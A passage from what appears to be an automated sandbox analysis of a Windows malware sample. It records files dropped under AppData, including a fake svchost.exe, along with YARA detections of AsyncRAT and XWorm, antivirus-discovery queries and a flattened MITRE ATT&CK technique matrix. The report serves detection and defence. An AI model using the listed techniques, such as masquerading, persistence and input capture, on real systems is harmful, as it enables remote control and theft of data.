                          Source: C:\Users\user\AppData\Roaming\not rat.exeQueries volume information: C:\Users\user\AppData\Roaming\not rat.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeQueries volume information: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                          Lowering of HIPS / PFW / Operating System Security Settings

                          barindex
                          Yara detected AsyncRAT
                          Source: Yara matchFile source: 2.0.not rat.exe.df0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.sDKRz09zM7.exe.3059b50.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.sDKRz09zM7.exe.3064190.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.1366284151.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000000.1363070453.0000000000DF2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: sDKRz09zM7.exe PID: 7316, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\not rat.exe, type: DROPPED
                          Source: Amcache.hve.12.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                          Source: Amcache.hve.12.drBinary or memory string: msmpeng.exe
                          Source: Amcache.hve.12.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                          Source: Amcache.hve.12.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                          Source: not rat.exe, 00000002.00000002.2630548369.000000001BF20000.00000004.00000020.00020000.00000000.sdmp, not rat.exe, 00000002.00000002.2612423692.0000000001300000.00000004.00000020.00020000.00000000.sdmp, not rat.exe, 00000002.00000002.2612423692.0000000001341000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: Amcache.hve.12.drBinary or memory string: MsMpEng.exe
                          Source: C:\Users\user\AppData\Roaming\not rat.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                          Source: C:\Users\user\AppData\Roaming\not rat.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                          Stealing of Sensitive Information

                          barindex
                          Yara detected XWorm
                          Source: Yara matchFile source: 2.0.not rat.exe.df0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.sDKRz09zM7.exe.3059b50.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.sDKRz09zM7.exe.3064190.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000002.00000002.2621953796.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.1366284151.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000000.1363070453.0000000000DF2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: sDKRz09zM7.exe PID: 7316, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: not rat.exe PID: 7400, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\not rat.exe, type: DROPPED

                          Remote Access Functionality

                          barindex
                          Yara detected XWorm
                          Source: Yara matchFile source: 2.0.not rat.exe.df0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.sDKRz09zM7.exe.3059b50.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.sDKRz09zM7.exe.3064190.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000002.00000002.2621953796.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.1366284151.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000000.1363070453.0000000000DF2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: sDKRz09zM7.exe PID: 7316, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: not rat.exe PID: 7400, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\not rat.exe, type: DROPPED

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                          Windows Management Instrumentation                          		1
                          DLL Side-Loading                          		1
                          DLL Side-Loading                          		11
                          Disable or Modify Tools                          		1
                          Input Capture                          		1
                          File and Directory Discovery                          		Remote Services11
                          Archive Collected Data                          		1
                          Ingress Tool Transfer                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts2
                          Scheduled Task/Job                          		2
                          Scheduled Task/Job                          		12
                          Process Injection                          		1
                          Deobfuscate/Decode Files or Information                          		LSASS Memory23
                          System Information Discovery                          		Remote Desktop Protocol1
                          Input Capture                          		11
                          Encrypted Channel                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts1
                          PowerShell                          		21
                          Registry Run Keys / Startup Folder                          		2
                          Scheduled Task/Job                          		12
                          Obfuscated Files or Information                          		Security Account Manager541
                          Security Software Discovery                          		SMB/Windows Admin SharesData from Network Shared Drive1
                          Non-Standard Port                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                          Registry Run Keys / Startup Folder                          		22
                          Software Packing                          		NTDS2
                          Process Discovery                          		Distributed Component Object ModelInput Capture2
                          Non-Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          DLL Side-Loading                          		LSA Secrets151
                          Virtualization/Sandbox Evasion                          		SSHKeylogging13
                          Application Layer Protocol                          		Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                          Masquerading                          		Cached Domain Credentials1
                          Application Window Discovery                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items151
                          Virtualization/Sandbox Evasion                          		DCSync1
                          System Network Configuration Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                          Process Injection                          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
